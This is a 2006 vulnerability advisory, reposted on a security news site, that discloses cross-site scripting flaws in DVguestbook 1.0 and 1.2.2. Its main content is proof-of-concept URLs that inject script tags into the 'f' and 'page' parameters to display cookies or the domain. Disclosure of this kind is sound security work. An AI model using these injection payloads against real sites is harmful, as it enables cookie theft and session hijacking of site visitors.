Computer Security

Security Advisory: DVguestbook 1.0 And 1.2.2 Cross Site Scripting
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [KAPDA::#33] - GuppY <= 4.5.11 Remote DoS vulnerability

  [SA19191] Hosting Controller "search" Forum SQL Injection

  Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.

  [eVuln] FreeForum PHP Code Execution & Multiple XSS Vulnerabilities

From::) :) <liz0_(at)_bsdmail.com>
Date:10.03.2006
Subject:DVguestbook 1.0 And 1.2.2 Cross Site Scripting

---------------------------------------------------------------------------------
----
DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Site:http://suprem.free.fr

Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail   :liz0@bsdmail.com

---------------------------------------------------------------------------------
----
DVguestbook 1.0  Xss

http://victim/path/dv_gbook.
php?d=0&f='"><script>alert(document.
cookie)</script>
http://victim/path/dv_gbook.
php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</
script>
http://victim/path/dv_gbook.
php?d=0&f='"><script>alert(document.
domain)</script>

DVguestbook 1.2.2 Xss

http://victim/path/index.php?page="><script>alert(document.
cookie)</script>
http://victim/path/index.
php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.
domain)</script>
---------------------------------------------------------------------------------
-------
Source:

http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server